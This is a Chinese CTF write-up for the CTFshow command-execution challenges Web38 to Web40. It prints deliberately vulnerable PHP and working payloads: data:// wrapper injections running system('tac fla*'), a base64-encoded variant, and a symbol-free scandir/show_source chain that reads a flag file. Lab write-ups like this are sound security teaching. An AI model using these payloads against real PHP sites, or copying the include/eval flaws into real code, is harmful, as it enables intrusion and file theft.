当前位置: 首页 > news >正文

CTFshow系列——命令执行web38-40

news 2025/8/21 7:44:54

这几天也是趁着有空,多更点CTF的东西;毕竟得多方面发展是不是,不能老是盯着渗透测试和应急响应(虽然说也没少看),那多没意思。

文章目录

    • Web38
    • Web39
    • Web40(重点)
    • 总结

Web38

话不多说,直接开始:

其实Web37和Web38关中的 include 已经有点涉及到文件包含了,但大差不差。

<?php//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|php|file/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

可以看到,跟Web37相比,多了 php 和 file 的过滤,那么我们应该有点思路:

  • php被过滤了,但是data协议不影响,那是不是能用?
  • 至于 file 可能是针对file_get_contents 函数使用;

  • 解决方案:利用data伪协议 + 编码绕过

    • data:// 伪协议:这个协议允许你直接在URL中嵌入数据

  • 原理说明:

  • 当传入?c=data://text/plain,<?=system('tac fla*');?>时,代码会自动拼接成:

  • include(?c=data://text/plain,<?=system('tac fla*');?>);

# payload:?c=data://text/plain,<?=system('tac fla*');?>

在这里插入图片描述

Web39

看看这关有什么不一样:

<?php//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c.".php");}}else{highlight_file(__FILE__);
}

观察代码,我们可以发现 include($c.".php"); 这一句话,那么又与上一关的有什么区别呢?

在这里插入图片描述

include($c.".php"); 这句 PHP 代码的含义是

它会尝试包含并执行一个文件,该文件的文件名由变量 $c 的值和固定的字符串 “.php” 拼接而成。

# 上payload
?c=data://text/plain,<?=system('tac fla*');?>
# 编码后
?c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=

疑问:那我输入?c=data://text/plain,<?=system('tac fla*');?>,代码拼接成什么样了?

  • 首先,$_GET[‘c’] 的值为 data://text/plain,<?=system('tac fla*');?>。
  • 然后,代码会执行 include($c.“.php”);,这句代码会把 $_GET[‘c’] 的值和固定的字符串 “.php” 拼接起来。
  • 所以,最终要包含的文件路径会是:data://text/plain,<?=system('tac fla*');?>.php
  • 然而,data:// 伪协议的特性决定了它不会去查找一个名为 data://… 的本地文件,而是直接将 data: 后面跟着的内容作为数据流来处理。因此,PHP 引擎会忽略 .php 后缀,直接将 <?=system('tac fla*');?> 这段代码当作 PHP 代码来执行。

Web40(重点)

<?phpif(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

其实我们一看代码,发现就是Web29~Web36 的类型(没有了include),但是这关是将所有的特殊符号都过滤掉了;
所以我们的data协议等都不能使用了,因为包含(: \ 等符号)

难道我们就没有其他办法了吗?
我们仔细观察,发现题目并没有屏蔽掉 空格 反引号 反斜杠/ 下划线_

这个时候我们就要认识一个新函数:scandir(‘.’),具体的可以看我这篇之前写的文章:scandir(‘.’)的用法
(没错,几个月前我就做过这些题目了,只是过了太久,所以忘了<(-_-)>)

看上面这篇文章应该可以知道print_r(scandir(pos(localeconv()))); 查看当前目录所有文件名:

在这里插入图片描述

  1. 这里可以用next()来输出数组中的当前元素的下一个元素的值,也就是可以输出第二个(还有end可以输出最后一个)

  2. 但是flag在第三个怎么办?

  3. 可以用array_reverse函数,这个函数就是将数组转置;

# payload:# 打印当前目录
print_r(scandir(pos(localeconv())));
# 显示flag代码
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

这里细心的应该注意到:为什么前面都是用print_r(),到最后要用show_source() 函数?
直接看图对比就知道了:
在这里插入图片描述

对比:

在这里插入图片描述

总结

我知道很短,但没办法,我只是有空的时候写写,体谅一下,毕竟还是大学生。

http://www.dtcms.com/a/340640.html

相关文章:

  • 五种算法详解(SVM / Logistic Regression / kNN / Random Forest / HistGradientBoosting)
  • 无人机抗噪模块技术概述!
  • 20.web api 11
  • C5.6:双电源发射极偏置、特殊类偏置、PNP型偏置电路
  • 如何快速上手【Spring AOP】?核心应用实战(上篇)
  • 【买机器人,上BFT】香港大学联合项目论文解读 |Bunny-VisionPro:用于模仿学习的低成本实时双臂灵巧遥操作系统
  • SpringBoot 整合 Langchain4j RAG 技术深度使用解析
  • uv,下一代Python包管理工具
  • 机器学习-数据预处理全指南:从缺失值到特征编码
  • Tdesign-React 组件 Card 实现头部固定,内容区单独可滚动
  • vue:vue中的ref和reactive
  • 0820 SQlite与c语言的结合
  • 宿主机与容器通过 rmw_cyclonedds_cpp中间件进行ros2结点之间的通讯的相关注意事项
  • 开源的实时 Web 日志分析器GoAccess安装使用指南
  • 10X Visium HD空转流程1·Space Ranger v4.0.1的使用
  • [机器学习]11-基于CART决策树算法的西瓜数据集分类
  • bun + vite7 的结合,孕育的 Robot Admin 【靓仔出道】(十五)
  • LangGraph从入门到精通(二)——条件边与循环流程实现工具调用
  • 短剧小程序系统开发:构建影视娱乐新生态的基石
  • c#,装箱拆箱知识点示例理解
  • (Arxiv-2025)SkyReels-A2:在视频扩散变换器中组合任意内容
  • 分享智能解译算法获取及调用之建筑物提取
  • Ubuntu 虚拟显示器自动控制服务设置(有无显示器的切换)
  • pip 安装常见错误及实例化解决办法大全
  • 计算机网络技术学习-day4《路由器配置》
  • ubuntu下安装vivado2015.2时报错解决方法
  • SPI 机制深度剖析:Java、Spring、Dubbo 的服务发现哲学与实战指南
  • 根据Wireshark捕获数据包时间和长度绘制路由器发送给电脑数据的信号波形
  • 【FreeRTOS】临界资源管理
  • 树上背包(P2014 [CTSC1997] 选课)